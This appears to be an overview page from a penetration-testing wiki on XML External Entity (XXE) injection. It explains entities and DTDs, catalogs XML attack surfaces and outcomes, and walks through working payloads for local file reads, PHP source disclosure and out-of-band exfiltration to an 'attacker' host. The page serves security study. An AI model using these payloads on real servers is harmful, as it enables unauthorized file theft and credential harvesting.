Skip to content

XXE

When a web app processes XML from user input and the parser has external-entity resolution enabled, the operator can declare entities that point at server-side resources - local files, internal URLs, or even (with PHP’s expect://) shell commands. The vulnerability is mostly a function of using an outdated or poorly-configured XML library.

# 1. Find an XML input surface (SOAP, REST-with-XML, form data with Content-Type: application/xml,
# SVG upload, DOCX/XLSX upload, anywhere "Content-Type: text/xml" or "application/xml" appears)
# 2. Prove entity resolution works
<!DOCTYPE foo [<!ENTITY test "PROOF">]>
<root><field>&test;</field></root>
# → if the response reflects "PROOF" where the entity was, you're in
# 3. Read local file
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<root><field>&xxe;</field></root>
# 4. Read source code via PHP filter wrapper
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/var/www/html/index.php">
]>
<root><field>&xxe;</field></root>
# 5. Blind exfil via out-of-band DTD
<!DOCTYPE foo [<!ENTITY % remote SYSTEM "http://attacker/x.dtd">%remote;%oob;]>

Success indicator: a file’s contents (or its base64 encoding) appears in the application’s response, or the attacker’s listener receives an HTTP/DNS callback containing the file’s contents.

XML is a structured text format using tags to nest elements:

<?xml version="1.0" encoding="UTF-8"?>
<email>
<sender>[email protected]</sender>
<recipients>
</recipients>
<body>Hello, kindly share the invoice...</body>
</email>

Key concepts:

ConceptExampleNotes
Declaration<?xml version="1.0" encoding="UTF-8"?>First line; defines XML version and encoding
Element<sender>...</sender>Tag pair around content
Attribute<email type="invoice">Key-value pairs on tags
Entity&amp;, &lt;, &company;Named placeholder; resolved at parse time
DTD (Document Type Definition)<!DOCTYPE foo [ ... ]>Schema and entity declarations

The entity machinery is what makes XXE possible. An entity is a variable in XML - declared in the DTD, referenced in the document body with &name;. The XML parser performs the substitution at parse time.

Declared and used in the same document:

<!DOCTYPE foo [
<!ENTITY greeting "Hello world">
]>
<message>&greeting;</message>

Parser resolves &greeting; to Hello world before the application sees the parsed XML. No security implication on its own.

Entities can point at external resources:

<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<message>&xxe;</message>

When the parser resolves &xxe;, it reads /etc/passwd from disk and substitutes the file contents. The application then renders <message> containing the full passwd file. Vulnerability primitive: arbitrary file read.

A second class of entities, prefixed with %, that can only be referenced inside the DTD:

<!DOCTYPE foo [
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % wrapper "<!ENTITY exfil SYSTEM 'http://attacker/?%file;'>">
%wrapper;
]>
<message>&exfil;</message>

Parameter entities can be joined with other entities in ways general entities cannot. This is the mechanism for out-of-band exfiltration when the application doesn’t echo entity content back - see Blind exfil.

XML parsers historically resolved external entities by default. The XML 1.0 spec doesn’t forbid it; security-conscious settings are opt-in. So apps using older XML libraries (libxml2 before 2.9, Java’s pre-2.0 SAX, .NET XmlReader without XmlResolver = null) inherit the unsafe default.

Modern parsers default to disabled external entities. But:

  • Many legacy apps still run on outdated XML stacks
  • Some apps re-enable external entities for legitimate reasons (XML schema validation against external schemas) without realizing the implications
  • Document-processing chains (SVG → image, DOCX → text extraction) may invoke XML parsing transitively in components the developer doesn’t think of as “XML parsers”

The result: XXE remains common enough that OWASP lists it under A05:2021 (Security Misconfiguration) and A04:2021 (Insecure Design) - see also its prior dedicated A4:2017 ranking.

SurfaceIndicator
SOAP APIContent-Type: text/xml; charset=utf-8, SOAPAction: header
REST with XML bodyContent-Type: application/xml (sometimes accepted alongside JSON via content negotiation)
RSS/Atom feed ingestion”Subscribe to feed”, URL-input fields that fetch XML
SVG uploadSVG is XML; image-processors may parse it as XML
DOCX / XLSX / ODT uploadOffice documents are ZIP archives of XML; some servers parse the embedded XML
Web form with XML bodySome apps switched from forms to XML internally but kept the form UI
WS-Trust / SAML / WS-FederationAll XML-based protocols
JNLP, BPMN, OWL, KML, GPXNiche XML formats; each is a potential XXE surface

The “JSON API accepts XML on Content-Type swap” case is worth emphasizing. Some servers parse the body based on the Content-Type header - sending the same data but with Content-Type: application/xml instead of application/json and converting the body to XML can find unanticipated XML parsing paths.

What XXE produces depends on the parser and the application:

OutcomeRequirementWhere covered
File read (response-reflected)Entity content is echoed in responseFile disclosure
File read (blind)No reflection, but parser supports parameter entities and external HTTPBlind exfil
Source-code readPHP target (via php://filter) or Java directory listingFile disclosure
SSRFParser supports HTTP schemes (http://, https://)RCE and SSRF
RCEPHP expect:// wrapper enabled (uncommon in modern installs)RCE and SSRF
DoS via entity expansionModern parsers prevent; older ones don’tRCE and SSRF
Windows hash theftWindows host parsing UNC paths via \\attacker\share\fileBrief in RCE and SSRF

The most common deliverable is file read - extracting /etc/passwd, configuration files with DB credentials, source code, SSH keys. From there, the engagement often pivots to lateral movement using harvested credentials.

PageFocus
IdentifyingFinding XML surfaces, the JSON-to-XML Content-Type pivot, the <!ENTITY test "value"> reflection probe
File disclosureBasic file://, source-code via php://filter/convert.base64-encode, Java directory listing, high-value file targets
Blind exfilCDATA wrap via external parameter entities, error-based exfil, full out-of-band HTTP exfil with hosted DTD
RCE and SSRFPHP expect:// to webshell drop, internal port scanning, billion-laughs DoS, Windows UNC hash theft
AutomationXXEinjector tool walkthrough, request-file format, automated CDATA/error/OOB modes
Skill assessment chainCapstone walkthrough - IDOR + verb tampering + XXE combining to read /flag.php
TopicPage
Reaching XXE via XSLT injectionXSLT injection
Reaching XXE via SVG uploadLimited uploads
SSRF as a primary class (XXE-SSRF is one delivery mechanism)SSRF cluster
File-read patterns analogous to XXELFI cluster
Chained SOAP → XXE attacksSSRF chained
Verb tampering inside XML endpointsVerb tampering
IDOR-protected XML endpoints (admin-only event creation, etc.)IDOR cluster